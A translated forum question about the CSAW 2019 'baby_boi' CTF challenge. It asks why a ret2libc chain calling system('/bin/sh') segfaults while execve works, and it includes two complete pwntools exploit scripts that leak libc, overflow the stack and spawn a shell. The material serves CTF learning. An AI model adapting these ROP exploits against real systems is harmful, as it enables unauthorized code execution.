http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1978
While solving the baby_boi challenge at CSAW 2019, I tried to spawn a shell with system("/bin/sh"), but I kept getting a segmentation fault. When I debugged the core file, it kept showing an inaccessible address inside the library. In the end I couldn't solve the challenge, and when I looked at the writeups after the contest ended, everyone returned into execve("/bin/sh",0,0) rather than system("/bin/sh").
When I changed execve() to system() in the exploit code other people used, the segfault appeared again... (of course I also computed the address and swapped it in.)
With execve() it succeeds... Is there some difference between these two functions?
Below is the exploit code I used.
======== exp.py ==========
from pwn import *

p = process('./baby_boi')

# libc-2.27 offsets and the binary's pop rdi; ret gadget
printf_offset = 0x64e80
system_offset = 0x4f440
pop_rdi = 0x400793

# the program prints the address of printf; parse it out of the banner
data = p.recv()
data = data.split(b"\n")[1]
print('first split = ', data)
data = data.split(b" ")[3]
print('second split = ', data)

log.info('\t === GADGET ===')
printf_addr = int(data, 16)
libc_base = printf_addr - printf_offset
system_addr = libc_base + system_offset
binsh_addr = system_addr + 0x164a5a   # "/bin/sh" string in libc, relative to system
log.info('libc_base = 0x%08x' % libc_base)
log.info('printf_addr = 0x%08x' % printf_addr)
log.info('system_addr = 0x%08x' % system_addr)
log.info('pop_rdi = 0x%08x' % pop_rdi)

payload = b""
payload += b"A" * 40          # fill the buffer up to the saved return address
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)

log.info('\t === EXPLOIT START ===')
p.sendline(payload)
p.interactive()
==========================
Below is another person's solution code.
Source: https://github.com/KEERRO/ctf-writeups/tree/master/CSAW%20CTF'19%20QUALS/BABY%20BOI
========= solve.py ===========
from pwn import *

env = {"LD_PRELOAD": "./libc-2.27.so"}
#p = process("./baby_boi", env=env)
p = remote("pwn.chal.csaw.io", 1005)

# parse the leaked printf address out of the banner
data = p.recv()
data = data.split(b"\n")[1]
data = data.split(b" ")[3]
printf_libc = int(data, 16)

# libc-2.27 offsets
base = printf_libc - 0x0000000000064e80
execve = base + 0x00000000000e4e30
binsh = execve + 0xcf06a
print("base: ", hex(base))
print("execve_libc: ", hex(execve))
print("binsh: ", hex(binsh))

pop_rdi = 0x0000000000400793
payload = b""
payload += b"A" * 40
payload += p64(0x0000000000400791)   # extra gadget plus two filler qwords before the pop rdi chain
payload += p64(0)
payload += p64(0)
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(execve)
p.sendline(payload)
p.interactive()
==========================
Hit : 2388 Date : 2019/09/16 04:56